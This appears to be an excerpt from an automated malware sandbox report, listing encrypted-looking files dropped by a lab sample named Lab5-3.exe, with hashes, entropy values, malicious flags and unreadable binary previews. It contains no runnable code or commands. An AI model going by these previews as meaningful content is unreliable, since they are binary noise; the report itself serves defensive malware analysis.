                                                                                                          Preview:....>...&..$......(.Y...A...%.@.1......E.G._.|'_..M....a....|....../:l...4.@..g\!O.p.l5>.".xi..... I.+....JU\.....&.).?.....!..XB...........y...".|24.W..1...6..QP.z..UJ.`....YJ.X.o.....!f^...Bs.7.,wF0.z6u&.....p<T..1..L...6tg<\w..1.......V.%.>.'...9.... .K.x,.%#V!..mH.T*$..7..r8......"1Ytm.c..rU.-dV.......}AX....d.a(l..@.||Qx/..x.#..0..G.|...s`......v.W.Y.T./..0..A._?-^@..%.*g.z..v.j..Y.$.Z...>.A.K.e.C.di.eR.wp.1jL..1.r..........C...\d.%..Q-..&.......b^.d....D...y..a!..3..'..........F.`..@....s..M..ma.I.....vp..y..'.B...|.c...c.>.>t.K.I....|...?.j-..l..>.3..........."...b.g..O..c.vOd.....B.A........4eU...+.Bf...}..."KA...Wk*"..(W...<Q:...A/r.,..PSd..]~8...Z.(i....-..7}.G).[......y.P.....o..'=A...Y..Y..e..#S:.P}..U..BV.~....O....mN.B.....T^.[UM. q .....x.I[+.......{.k+..9:.. .\RI..yN.....z...I..........M/E..o5u. fH...D.&U...^....."....w.Fe..........`.T.[8..B....6-......P..3.\3.... ]>-..l....3z.Z........?.......f.....[.....9..0C{I...#YV.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):15664
                                                                                                          Entropy (8bit):7.986952413140082
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:zwBm6Nd2pXGaWIUEV+i0bLQfJgMjaw4ovptb:zmOXGaWafJgC4ypZ
                                                                                                          MD5:7CED3586813E031F31861828F1DE14E3
                                                                                                          SHA1:B359A0B7FF9E8FF18FA0466BD45AA487DBB4962D
                                                                                                          SHA-256:579A9A4254B1644BE88A4953CAF8951F110CD64DED2D93C35389BF4CF96C23F2
                                                                                                          SHA-512:34176C2B49BB85A7185036DEAC92F7F4FD82DD5413F138346970332BB3487C6F3899948842A967BB7B60EC6E492F494CFB1D41FA143E5103FAD89D3226A817A5
                                                                                                          Malicious:false
                                                                                                          Preview:S...J...i.f..,....\.B...W.W....".n....[..V.x....~iN..5d.yg...U....*.....-)}.-..S.Q>..{C..3%{...b.yW+t{la;..N..viw3.r.v.R........o.hUm<gj\. ^....1.c...!.J2.?<f.86.t...V6..?.[Y).7...._..l~T6.9.D....4r.y...q..r..nD..Q.[.....,,b....Cb......?e.....7.rJ.D..\......B..s....>....gJ..\....0zt.R..6...CK..g;.+.L..?I...5k...j..ZY.5#...&..H.....>..J..y0j...'L.N..m.96E?.;..8.......oU..4o....?.tC$A...t...'../07Jpc*.U...`B3[3.$.!..Pg{.....Q..."..h.^.;...._...iU5U7M.X>LJv.9...i.M.1...=.rC+.W`....*h.O...W....b..../8.Vf.B....Z^."..\...X.4x]...t({.ws;~$/....]P...e/H......P4..O.t).Vj..t.<RH22.si...........6?-h.f....0....u.l..>.........~4.....e..).x...[6h,..D.[......$a.V..*~....O.+..eO..H.P.A....hV=l-#.. ^gb..@'...Jm..^.........-.g.9.J..VnB..o..H.!J.........z..G..Ul...<.C... .....,]..3..y..e.0@^1m..GU.....>..S...``ZBD.../.....V....z#@x'.}yb(./....S........"...pd..6.UR..&*.d..mb.z.>8Pz.T.Gg.uI...x.d.......T...E.}%./...UNa......e...U..0!....W..&.....z.RD/...qbH.I.Z.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):23696
                                                                                                          Entropy (8bit):7.990782839754997
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:m+X/D1OkaoNYkYZTCCvbXglIopnb2ZGLKyJTzNxnUwaEq4Zhd3Vqqtb:my/tRYkWP7g9YGuy9/UtEq4Zhd3hZ
                                                                                                          MD5:305B25B057F00FA4F94C5E10EAB0093B
                                                                                                          SHA1:8D7CB390FD869DCE389D50A743804920EDA519CE
                                                                                                          SHA-256:880715C1226EAD5DFAB2AD910441D1E315E7927707E29E006DA49CBBD8533A76
                                                                                                          SHA-512:F25B39B9A8D36965D0031C0244B1F1865F6992031A806AB3FE8C9BEF7384A765A5DDABF09DBE7EBE57B5AB586B70DF962805AA79C0EA3C5FE2CF294ABCB23BBD
                                                                                                          Malicious:true
                                                                                                          Preview:...< .A..X.I..iA*...1.)..ey%..p...8...IR......g..m....f...k...21.&.T|..Uc..2......x0...x%.h....h.-O.......]..{.(a........."e.y.7Y........z8n..5..KE%..D.^.&..9...4...3.j7@]. ...5.'..D...V.Oq.g.m...^T...(..{..6i....!.._!...0..|... ^4..tf.V..$=.....=...,.......V.&..Jm.0..x.s.7.=..P.~q...-...`..A....s..P^T.).3....L.........r.....r....f..y..iO......%%~.hS./....d...B...J...k...-Z......).......tm.....n_.R.R..k...b......c.....CTS*".F...,0...t..Zi. .f2...kx...S|...\.1(g..B..n>4..O.....m..^0.8M...._.&...........A.W..@pe'...u[.dg...."1r..3D.......xF...].8I/0.2$M..n..3.Q.q..O.83.e.Go.8.D.......vs.z.6....;.S........$e...{........|Z;S..N}.C..r.....$o.S.(.........F.....N.z.._...TT6...../l.p.8'C.Q..+y.......A....j.S.8.........3:.(B.......%;.......&gG!...^.....F.b...#o\....\{..._......e)i...$g..b.Y..o..J....I..T.....]-.[....F..U+.....f.g....><..T..4...{..#}.O..... .{Js.....H....a..#.4w.......-..pW.Ka......G......L..N.;.U.e*..M..,6.6..Dk..+...OC..G..e_Zy...tId..<.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):32208
                                                                                                          Entropy (8bit):7.994194426809296
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:P/ziH/KY18Tx8dP7849aVKfd8MbxfpoXawZZ:3tWi2tIqaVcCLawZZ
                                                                                                          MD5:99B66312AC866A93F8E34450C162C8CC
                                                                                                          SHA1:0217898A9A35C9F186946CCD6A6FAF87A41544B1
                                                                                                          SHA-256:06A9706A4209C5F9D28EC9DB844E8E9B173FC871ECAFA19D89BA46FD4ACF8E31
                                                                                                          SHA-512:47CF0141A2AC088886FFF345D36F47B4DB2AEFA1DB43BF113E03C5E8244886C26134D6A0B993F1E39FB3BD50D02E8880DB57EA7B857D23404E49EA8124E37E98
                                                                                                          Malicious:true
                                                                                                          Preview:a.I.Zn)M.~....AH.....[.T.../.-.x....j.1.|}A.k....P....;.....3......[ .@.:p....:}Ft.&...e..ej,J.5..mGp\..6..H.P.}.Gq......d+.k..b.........L.f.h.=.aA...S.......*.)...".Q......K...X.o..ca....9d..C.@7.aLTG.X.H..9.Vd...t.;..<.....).&td....*h.....G..)\.,..m.+..<m..P..w.v..'.z..l.,v......H.@tD..E...T$(...B....E*..U...Q?aI....i.I.>..q..G../.......W.......E.T..R.:-4&..e(.N.:.&...J6~..X1;..9.v.W".. ..g.%....O=..q....2. s...5..".YO....p.a.7.~r..L.3...2z.%...y3.k.9..9..o.......ke....=...l.G.\.......(|.o.A.)..$......{...]....#.Cs.....?.).1MP......$........si...WcG.3'.-.1`......mk^..C...z.<LK...7."D......#.S.....B..JX......u..qfs.G...k....e"l.6.^..>....E...L..t.S.....C.8%.j...%..l.;r..az_.<O...U...6.f./...j$....Z. ..sh...."w.m..`.e\Puz7....n..x...@.6. ."......._3....z.Q..M.g..^i..AU...B....c~......]o......vK.......kJp......ME~q..y.c.>.p.1...H..m|./'...4.k...m.>NmZ.T..^.m@Q ...N.>.....[.3do.Y...]..T....C.....g [...U.|.U}....H..P...W.d...|..j..W...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):8128
                                                                                                          Entropy (8bit):7.977685223900653
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:csSKXZj0qqjr7N8NohRe6YYDOKRuvGA1B0Cb:pSLqKr7N8Noh0mfRXuBtb
                                                                                                          MD5:112602E5C2677171819017C6EAA7E9E9
                                                                                                          SHA1:0E34BD176C08026CDF675A0CD489318617D381E4
                                                                                                          SHA-256:BE4E511AE9670717445F66F207B5682C7284C60BC8E4A42BCCEFBDDAA87C0BBD
                                                                                                          SHA-512:FE8477B268348FC5C683648673D0FA8F77DE7E8A86A8FFC7CDF9415721E426D0F99EF3DBB9127F51668E605039C654D2C7B7CF06D3BB0124018ED3BB823F6601
                                                                                                          Malicious:false
                                                                                                          Preview:WH.d.%.:KZ.m...9..%...~.@L.-..$05.~..p%..O..;..g. ..1.v.g...6:...B...L.J..?O...s8.~......./....|(.-q...l.{*.....`.....>...4r.C`.5...+..Y....<...u.#nC...Z....oM...VQ....i$...............,0X...xMr.r.<....B?.5.m.|..c......^.]6.l....;A.R_.yy..Z.6j.4|..}>i9I9..V...H..D..dZ1.U.~_.<?.Y<.b'.RVp..sp...0Q...+$....O.1%C4......XG....].,%Z...c......nUm..zS.U~..&....E.i6..T....8.4....W.L....&?..o..=I.L.6.....M.k...=....b1q.k1...Z..|.:0...ij...b..*m...,....K..B.~.=..,.=}.}...(...>}F.L.xzl.....}.....,;...M%.......n.6H...ot....a..w....V.M..o.U=p.!s...CC.`.d.*.+ X..{.F0.:...~..d(.g...T....h.u...?.zo.%.U.'1/.N..XIZ3. .}.......D<`.*d.k+C34...8...M.Q.r*.....3.!...ytf..!.e...K.2....WJ;..[fe..[..2.R4=....>.]..ku\CR.aG..)..|...=[!M....I....*...$.....G....4.4X.ao....D5.%|?F.L..s?..F@..sC*.z5..L..j...3...kB..N.O......T.|1....Z..6Z.|........z....5P........#....,..6.+./w[.B<. z.v.x.cK..q.?..Y+)0........w,.6.sV..(...q...;..tc.^.~[.;..p.p...Zj....y.0.M<..8'..`k.ag..k..}O.a.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12304
                                                                                                          Entropy (8bit):7.9871097355008445
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:M1q1x90GJ7Qg5fRlbGNo9jIzPk2M7rlN1mKppu+6dxuR8Z4VJ7VBVLxV/exhXqwY:MgwGKg5JMe2kF79mzuRSSfD1efXSttb
                                                                                                          MD5:5389647944A9B7222FB16D1C5ED1EE03
                                                                                                          SHA1:B7C7013C2C2D416410402AA8FBBC446B82DB4847
                                                                                                          SHA-256:491A8D860E6819125B71F13A87D25DB4253D7E48A322DB5EE79E5B6B94E23909
                                                                                                          SHA-512:EF5CBBE4B69E9005667DA30EA673D87855169C46906182BB05A669D70F3A7E9E2F5C209D4B7AF391F0678274FAF83A531972B37E514972613A80D5C61F39D137
                                                                                                          Malicious:false
                                                                                                          Preview:.5^.1y:.#.jZ....S^.f..f.n..S..J..m......M..l.......(.:.=...A.....o.X....C#XB.^=.S.%P.....:.7y...4...n*4[.S..b.....GW%..ko5A(....c1z.0..M..c.c.W..]o9 .K.?.0.miR.l..`.....i..A.=}.\.e...Z......w....|ogqu..t..,W.b.:.C..j.QJ..C.,4g...^s...a..8.DWzsW\~...\..2(...c.4..&f...+..zw..:_+.l....lo.v...*wDEj*....|7.6.$.....4|+.V5.a.]...&..8.y.h...j.&zyk.Z}.u.a..0....es....]+..2(..........v[...1A..g.G.k. ....S\.....t9x.]....C*.{0IU~\*y.h..7..O>...|`2n...F..dd..H..,....g.8"MG}-.c.....%3.=fdh.}B:.`=~V.!c.......bG..E...JIRN...$e.~.%7y.t..}0........=^....%t...Lj8f.j...6.5z.t.7/.g.......z.]R...<%...:.,..z.>L.....&...........z..rD..8.ex!.....$.......{M..Y....+...U~....=.3!...?u...H......8O....".~#D.. .w7M.....v.....u..[.J.F 7T.(...1.U...p../.......(jw..@.b.P....Y...yq.....(..$.p..KI.Q.>.@Z....Ta..<..<5..e.,5.5.`.....^>p9...../.)6..V.'M.mB........=..5.....\......[&....F+.<j...$....f...|...S3..V..0*.s..C2Mh.lzt.Fs....[#.NN.:Uol.{.8.V........F...%.b.?8....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3328
                                                                                                          Entropy (8bit):7.9376346125016175
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:zuFvrGH11C8hYyQu0j4AbJNbSGx0uKeY2ElUJ:cI1R1Al0Cb
                                                                                                          MD5:AB1CE14A7704512AC6FAD65A4A964F3A
                                                                                                          SHA1:8C6AC7484EE319A18D3DB55F0C95753659B43F39
                                                                                                          SHA-256:4BF82D1C0E9FC3294C0310D24BE187C654F2A3D747C59FD285B89AA86327F7B5
                                                                                                          SHA-512:54BAB347ABF8BFCCE84405525C33D81B3039024B817FE397F6CBC858B9E7C272A974A4F9097B8AA27DE4DFAA99E1B4E4B7D1255C9D5B973583EA86F323D8819C
                                                                                                          Malicious:false
                                                                                                          Preview:r.<Mi.NE.'C...l...0H..'...Y./~".K}...o........[..+R.8j{..n.;..L........FV...zVn..K..C./....X.......Q.~,..x.1.o..s....4....!.....6.....o~7c.j(.../....`T...G.`....rC.W..w@/..D.]&g%3...r...x.M....d..`pd*N.I.h.=.oU..'....}]7p../.8v).".0.....n.<|...L.......+..3...t.9..7|. e..{....s.D...n.m..c.....{DS......c.<M._...r..$k.wjX^P...#......]"...BO. ...Q..9.8.%........'....*.+73...W...p]..l.5.IDO...*...:...<..w-.S.OP.....&amE.C..9......nG.q.W........5/.....7.....[...kQ.!...6.NW....f=>..O.(.....d.m*B.-...7.s..Bg.........VRaC.j.....U.....MTVz..\.....L.....W:..Z.y..).8t.....D..g.Z.^:j..w.r.Z%pn...u.....g.J.=.E/........|..H.....D.b~.a........./..)..O....5.I..e...#X..X.....o4....O[...Q....{B0..._....!...Lm~B.N=......p.... +..J...jY@$.D...<.{)@..kl....q........p....r....4IB."..{ .....j........R...y..Sh....O.x}w..;.%U....s..`......e.....;S'Lo...$..I...C:C..>..o.....nt.-..-.$z.......r....z..:...]...7uRt...E,x......."..@..&o.....-.....6.........."..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):15392
                                                                                                          Entropy (8bit):7.988212896322791
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:FyJq7D5d6wXsjY6ltYvDAjVHTzhvZ5Adbir+JfS7tb:0mZ0YvsJ7KdOr+JfS7Z
                                                                                                          MD5:942529A78FCA43B9A19C94F8230B66EF
                                                                                                          SHA1:651ACA999FE70B0C4D5360D131E0FDD9477E0F5E
                                                                                                          SHA-256:7DE1A1DBE72C069647BE58F8995476DC659D5A279F731D70833445550197C69C
                                                                                                          SHA-512:1CDC13710C0A7E36661731ACFA80C92C7A32F493B71E6BBC644AB66889C000F916B733C6E7E632F9087E95F96608E0C9899BD4600EB355753C9EC269BBCEAA7E
                                                                                                          Malicious:false
                                                                                                          Preview:J....}...*..'..<^.!....+r#R.2..l.x."..E._<......?..[I..V>...b/....n{.s...?.....V.^.U.I-NQ3.]...:.I....v......AN.>...\._.......E....Cx1o..df.+...!B.@..9X..O..(....du.....8.UY.8.....8.3B.(R.HU....T...F....^.~\..8j..`.B...P.$.r...........5.^\6.....z.9..&.D...V....b(.Vpv;.\_.A..~.D.......1..bAC.cZ....(..J..Z....n..f>...2....Q...Q'Ck.u.4c;..I|..v..b.i..{....r.cl..Bh....i.:k.....F..<!.....N..I.>.`S.....D....J.0e.h\.e.`.nW7....^.....[..p%Lt8...V..>.u.D...rp..=x.v..q..w..........=.....f:[#...v..v?+.s...@m..p(A..f1.L..o.p..?..cQo.......a...V....u..K/..._......$h.Qz..#.9G...G..w...C..x.......X.91...I......4.X...t.~Dv..V..z.....J..a.q.n...X.Q.zC}.9....a.<...Q0..q....^...\L.).IK.9.......^..C...V......L.Yq..o.. c...s.........[t..p.].........\Y......'......8....g'.T`?.O&..3ce....mU....BZu|..b....o.5......E...lcz._.z.l..q.,...X.tZ....7.n.Q.D|.q........rh.G...c.r|&.....E.,...R...E..)....2+.G.}f..u. v./.}..a2.....4q............8{I..3.Y^.5.......O(..h.f....q
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Secret Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7168
                                                                                                          Entropy (8bit):7.973047051833328
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:RzzJxwKo/MSt0M6SQiz4QU4Impdw3Gg0Cb:8f0f7HQU4dIGgtb
                                                                                                          MD5:2626FC3D7AAB567CF20B546B9382CC58
                                                                                                          SHA1:72B0ABA309F729309BBE659C05A846531EB086A0
                                                                                                          SHA-256:3A11851652671EAE7F9387DAC4DE3B2F78F4AD9C7EAB62750BCE539F9113A3EB
                                                                                                          SHA-512:F74C7C76FB5E4E1DF9A35639211DC850485DC31DEB0B048CDADE40907BDD13E1597C30E2F2CA41DF8EC2FAB388F27EB72AF90188A5821BF9643AAE4EAA548CA9
                                                                                                          Malicious:false
                                                                                                          Preview:.O!.."..........=W...8.....W.._...v.......[.mZ..o....,..d..\.j.xUG.qBLD5.s...R.G'.9..W.o<..$....~.V..7x...,..G^7..z.'.T%9..d.+..<..Q.%....9..P.58...'2|A7.)...U,...F.N........v.{Z..;.r..-}... .*...R..*......*fT[.B2....}........I.........h.h.2..........5....Q+....p..h......{....D.7..xj.....n....Uf.^ m.S.V.7.:&.....sF3+.X........X.|h .....`D@.H'..k_j d.IW2.g._i\?"Y.E.I....TW.!@$.tz.........p>.*.."l`I.X...^?.....T..M0..!.,.2...:.....W.)..y...?.0A....,.H.\'.:.p..o[...6.!m...G..._....J\...'=4......I&@..E|p.._L.j....s T..tmi....~.@.!....<t..E<.$..U.T$p...r......:..$7.]...6....Z.J....&B........+..i../IbF..a...i.....Mu"d...A(.Z..L...w...:y..]......k...AaWvhuh..2.S.......d..1....c....`.?..^s..~.#WN....P...n..[...}?...L.).:..~..E3.Ul........s.....3P.A.....Q..2f...'x/p..9..}+...<b...Z.+g.:g3E6...Z.;V .U........C..@"..1.`il......w.3Rc.z!2j.......?..r.?*.cy..a...v..b..l@...X.w....."...bojnx......eQ.....`.Be..W_.T...rS1.b.7S.../]k...X...8*..\.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):20976
                                                                                                          Entropy (8bit):7.991912119874059
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:9c5Vit++j4OUY+xGIimXV/8swTIUYl+Lq1dqpiiAGqQmOQ8B7Qtb:m3ig+jDl+xGIimXVxwTO4adqpYGqbOQX
                                                                                                          MD5:A644071D852A4AB077A5326111316DB9
                                                                                                          SHA1:183497A88A86E9415F2B0B8E837746A49ECD991B
                                                                                                          SHA-256:CF9FBE92FC22B26012F344C30E39167B5263C6F7D747C3C7734D2079A745DF0A
                                                                                                          SHA-512:7200CFDB8D8BD6361EAA577AF4DA0EA3C6EDB52B459362D6885DC118438DD1ADFAFA7C7C2CEE61E26AB7AF5A3CD14C2262B824EE38D183DB0DE8032745350CBD
                                                                                                          Malicious:true
                                                                                                          Preview:..L..z7.b*..]q....^R.T...ZE. .-.....7/&.<....._E.t'.Vb~........Y. .}...?.!.t-~....Z.x.Bk(..B..k.K...$m".....N:...LP....N.9./!......7.....y..B.....D.]..-i....e...".....to........d..J.....-T..N.:......qW..s...).V.z...R.n..T.)L...?.uS.q@.Q{..O/d..`..#Q.GO...T.&.E.....M........v.0.TT`.y..m....x..../....1GIc&}.O^I.U......0..U..r....F.n..l....l..M...bd.f.....:................M.',.t...'.79..U.W...#3...l6..MP3..S...(g...W,.OXX.....b.,..<Rct..}...; ..{.j...lV..e=.V.....U..i...M..#.,...I.xp3f.:..X.C.%....fF.gEb....b.]..<...~J.".Yw.f..,a....4Q..qH...6.h..H<"..X..B..(T.k..P.y.g...bXf.].u^....y.........T....$.$....E.T..@2.=......<.k.]..W{.[YA8c...0..+.......o..,..O....G.&....M....?...r.....[......R....1.k...7..7..B.n...Y......Wy....pH....+..Cw...Y...ofp.7.3..TP~hI..`^._....._.....r.;.O...&...Wym..E2.m.Q.Q.8.Gm_y...B;.&.r....Ym..d;.......b..@e.:.E..!...AFG!....0m.....0........ZL1....1...!~-.}~...a....W.........K...>.YJ..x.*...y2;.&..|....,....jH..hh
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6768
                                                                                                          Entropy (8bit):7.969802140173426
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:59EtDJT7X837ikAZRL7ZebkeNgooDDeST8WfYuVrqXmIfXQAAGx0uKeY2ElUJ:kTT74OjZ7Zebx1AsmIfXn0Cb
                                                                                                          MD5:620D2B05682BCF6FFF6607E2F71BD1C0
                                                                                                          SHA1:0B2460384D550E4E0558151585D52CE228DF76D6
                                                                                                          SHA-256:96F2E5D98448C81EC31CDC438139EAF255BDA3BE6458C8B1F04191B2124B398D
                                                                                                          SHA-512:960F5B0B785655E0A5611B14561823F2B7E9A79492062344DDCD992E56BE69FB599DFC744BBFFD7DA65DDF61C7B7B3113F7987ABB1F6494BC5D04467F582C8C8
                                                                                                          Malicious:false
                                                                                                          Preview:....z....T)..&..7...@..+C..P.~.....AC#T.&..%.5....xot.~e..i.K.kmx7....~...O@.$.z..P).Y...*...!k....G8a..].0.=--..g.a.%4..<..#.@.......$l~2.......1t..i..1..j|..kr.a|...K...G.....o..R..%<8q.S....;......[y........}.o.].3q..@.(m...x.(..f$...N0d"..r......A.....[l.....r.Tnr...oC`.\.B<Y-t...j...Fq....:..;.!..?.N&i....l...{..(M..2................}.._*1}.v#......%...G\...p..R..wC.@.q.x.EH.1....w.n.0.W.r...R.....2?.].H.i.......T`..).=.=.)q.%...z..7....8../.k....6.ty..^2..yD.1+.[....ws...T.a....r.......RC...o......ER..c.....:.N....21.j.{...H.s..........Tl_V.zl.d..d...r+w7....*..,m.=K..b8...J.\.M}/.....jp...U...J+.2.A.#!.$.C..x....!....A.e...q...R..Nd....s.M...h.Iv;...\.x.=.#....G!.u......1r.|..>..>.g..?.ZX..,......PU;..C..6..\0..L.i............S~.6._......l..M.`C.q..)..g.Za.GO.F.I.8.&..D.;._.1...".w.>........".`.&]....y.]y9...M...F....&..E4.r.Yp;...| .b...k~Z.a..u.d..X....m...ay.F.HJ~z@.8.:zx.JJ.<..._.".p.D.ip4..|.V.......v~\!R...."..v.Q[...........
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):16896
                                                                                                          Entropy (8bit):7.9896962272342815
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:WT0XXsOUEAJk6xYvao8JFTis8sUzd+hGVOIHmUGpUttb:XX8H5j7FTd2LV2UGwZ
                                                                                                          MD5:E51951C9D4B70BE4A4661557AC03E1BA
                                                                                                          SHA1:670B32E0ADAC9B2B335D48A1ECA8D1D325237B2C
                                                                                                          SHA-256:72C1A3DCBB8FD18756C309D570370ED2298FC5C52A24980A631EB66C1FB0483F
                                                                                                          SHA-512:D70B0375F3F97EA6391132C0C798B0BE23AB2B1DD2867D03509F42A6109453870113FC968B4ACBB8CC3CBDFD27254425C4825DA06464018D5A055FF9377698BB
                                                                                                          Malicious:false
                                                                                                          Preview:C.)Y...=..em.0..m|..he....,..i.C....=(...j4..-y.L.f[..e..,D..A..]48]..19/m.u..Ie.;OU..BK..+.+.....C./>s......n.8&..].."...P.^I..".~.=...u.......F.[r2...j. ..U`....g.\...b:...VL3......e..e....c...3...g.....]M..6.R.J!a"....Q.2)r.......C...0......$...Xdpcy.t...2...#4.U...{B...h..x..y....l..Xs.....C...c.(.....:^l.V..........m.s.S..^..:...gt=...j..t`..o34.../...lq....(>.;..pU .]!.7Q..9.?.B..!y.....M....................E....,....[...}T.....I....m..GF..G|.s}.A.R..... &Z.."....}...{...@.a.N.3.T..e.6>.......v.&.#.....~.....ffy_w.>>.b...m..2?.K..t:..B.{.............;54.....L.(..__e)......vs. [h.C...x.........M.e.bE?.~._X...q]1>.;...y.l.b..md.t..U.......v+za...T.^...Djz.Wmj..V|hD.32H&.......c.;.a.i..w..Us..CI.. ..F.T.W..n..fI3...C....T.....}..4.V+%H.N.~.5..3^"....i.<]U..X........,.l.....Dw... .....i.....&.....\...q...c.jTN.gF..<D.d..d....N...\y^.{#r..a..R...v.e..p7".7.........CV.E..%W..(....8CX.%.G.l.v)@.V..D..... ...].0h...(.=~._.#R.M+.....o.+../J.\.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6960
                                                                                                          Entropy (8bit):7.979098107670178
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:BZ8d7QHTN4NQrfR9kUddL+wpA89JyPO2drjFBg0Cb:62h4NQT/ks5uKAXfgtb
                                                                                                          MD5:6B74A148B758515C2DA7FAEF27F8D549
                                                                                                          SHA1:40E01B80436D1D231D22E148F6D35DB1322FB9AC
                                                                                                          SHA-256:CD8BFEC1FA87FB52BAC27D2CE53E7ADEBAD6E68AA9D21F0B53D71F2A0B65F361
                                                                                                          SHA-512:3AD694C123B4D16DFA4A951C7797833B6BFD40377CA918223EE85DC1C859BDF36FD9A3B8946C3C739BD71580CE53DCB8858F2BBA6D8CC049AA277C4BB52187FC
                                                                                                          Malicious:false
                                                                                                          Preview:...RFf...l.....(..r....\..Y..@.~.LN.P....;.&..wL....R.f...A...z.f...M....].ld..q..Kb...HX......_.|?.2...6.u=uV...g.....5JS...[Y...e.......u[....T.N..L.?..L.]...A..+A.%VP.#..w.V..B..>...m..Z..||.l...^.'...mO...S.wg.\.,,.....+....c......*.@..t..e......M.....xn.........B#d..X.@...G%(.....L4.........kUqY..mV%.*D..E..JHVc..'...+.M..G...K....%%.f.H?_...H.. ..3."=._s.Hzv......c.W.nm.u..{.\hv.j..UCd..j$I.I ...\.4...dO.XH..y.o..^.P..d..<#h.=n.....&.....J".;.i...Fj..{}..y.6.q^gG.Hg....i...........U6..y...[.......>...!.y... ..C_CyH6...Qt.;.>n.."l.h......!D7.:Y~...!..w.r..:O..I.....@.....AS.}P.K[.{..E.h..4.BX..E3.p...../}....._9."s.5./z.].g......d=...C......{...r_.*.]......(.pv*..>9U@...=....l...B..........,.....@aD%.u........e..........l.=.T\..8...d.....CU...V.._.oJ.(..&.6.w..%...T.aC..lTs/v!...RN..9.SU..F/..ug.Jl,....g.{...k>}...0....Z.lbo.q.!..x...8...W.j4..2.~W.PB..1.$.Z...4Y.f.......w._.$.wWza..h^..'\Wm..i..%.L...mu"`...N.....)..P.W,.@h...7..W.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):19504
                                                                                                          Entropy (8bit):7.990774377214168
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:wot7fi3GbnIvrUbTGXNn1QScKbC0YPrGR4hcOd9CnCkWi6UnfDC6ptb:wot7KC0QWX8Gdac4STnCk/RpZ
                                                                                                          MD5:407D8CDFBFA3EA69246A5B590CB3B02F
                                                                                                          SHA1:A3EDC2FE51E63D05E8F005FB99D2B83C311011AF
                                                                                                          SHA-256:A4B26269337DFCF1DA3D2F6A45E15C845E331519902953E33E384554ED769049
                                                                                                          SHA-512:597288FFAD6C82F9069D7CACA90BA99223CCE332595EA194FE20594C3DFAF9BDC52763A6F44B6420EECBB5E01951242DD92C7E59339AA79483A0AD93E7B6CB48
                                                                                                          Malicious:true
                                                                                                          Preview:.X...:.(..b..D..[w%...rv..8...l~...3...+).7.|;:*.L....p..."....~y.F.&.6....9.%...@X.b...m.vk...@.S".........z.<..~....~/D.$.........^/(.v.I.S..-.....<.-...Z....F.f..>J.{.$..k./....D...d.g...Ud.`!?qYY ....].6G........L.K_......3w.2`.e..,........R.s...E...!.....q....}.........q.0.s.KA.J..z.....!.......a..?.../P.L.{u.2..I._...4.I.........4.....,J...w...=.C...?..hJ.<.Y-....).D..Y.r.FZ.@..._#m..A;tT."L..<._.....AJ.&s..U.t..u...?\.... .-....Gb....`....?.>R.....q./.'..%.Rv..;..>.z.j...Xx4.y..X6O$...........;Xu..&X...j.^...".yW.^...8..nD......sSUe..PDy..y....\..ix.V..}p.o..q....r....d..28a.~#6..Y.a..u.\..t.....q`.(l.d..2..U..5.y"<7..-..e.....C]......n.........$..6....^"..h........F.(.o...L..w...{.C-..<W;U.........;..PF.L....}.6....R.~.r..%'...R..wrr.c.f.Ls.V.....Q_.%Z..jt...!...f ........{.~W.......A......MgQs..@x{p.....}rsv.....PR]!.>LB1.......h..{.;t..Zau.A]h...@..%..Ia>G..f..</q.."].X[.ZfdS.^*.......mP.......l@..\q.}..DQ.:.tM.U../.@V.".J.6B.3..B....s'.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7248
                                                                                                          Entropy (8bit):7.974640213584179
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:+Cws2mrL6HsZFwaKKtDHrNTo7jTAUXtCv0Cb:+Cws2FMZkQrNWjdXtCvtb
                                                                                                          MD5:6EA9DF93548BDC930A549E20936CE5BF
                                                                                                          SHA1:0B57D8E21A759E2325F772EDC215190A3FD63B49
                                                                                                          SHA-256:79182F8BF232EDAF034620C430D79DC6B80EE711442B6648E72C5804B39648EB
